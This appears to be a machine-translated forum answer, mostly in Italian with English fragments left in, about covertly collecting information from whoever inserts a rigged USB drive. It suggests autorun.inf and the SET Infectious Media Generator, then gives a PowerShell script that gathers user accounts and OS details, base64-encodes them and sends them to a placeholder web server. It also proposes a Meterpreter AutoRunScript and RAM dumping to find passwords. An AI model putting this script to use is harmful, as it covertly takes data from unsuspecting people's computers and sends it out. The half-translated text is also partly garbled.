Ottieni informazioni sul computer (nome utente registrato) segretamente usando l'unità USB

Come probabilmente saprai,

The SET Infectious Media Generator creates an autorun.inf file and a Metasploit payload Source.

Poiché non si desidera utilizzare il payload Metasploit, è sufficiente creare un file di esecuzione automatica e uno script PowerShell per la raccolta di informazioni. Esistono diversi tipi di informazioni che è possibile raccogliere, dall'utente connesso all'indirizzo MAC e così via.

Un attacco più sofisticato (che probabilmente richiederebbe autorizzazioni aggiuntive) implicherebbe il dumping della RAM dell'utente bersaglio e la ricerca di stringhe particolari, come la password. Non sono un esperto in questo argomento, ma questo potrebbe essere fatto usando strumenti che sono tipicamente usati in live forensics.

the catch here is that I have to only get only the (non damaging) info of the computer/user who inserts the USB and not directly access their system

Da ciò capisco che vuoi solo alcune sysinfo, non le credenziali effettive.

Script PowerShell per la pubblicazione delle informazioni in una pagina:

$userinfo = net user
$sysinfo = Get-CimInstance Win32_OperatingSystem
$Text = $sysinfo + $userinfo
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$USERDATA =[Convert]::ToBase64String($Bytes)

Invoke-WebRequest http://www.yourserver.com/submit?userdata=$USERDATA

Si prega di tenere presente che ci sono alcune limitazioni intorno alla politica di esecuzione. Penso che una soluzione molto più robusta sarebbe un Meterpreter con un AutoRunScript che raccoglie le informazioni degli utenti e termina immediatamente.

Anche il computer moderno non esegue più automaticamente autorun.inf, probabilmente avrai bisogno di un po 'di interazione con l'utente.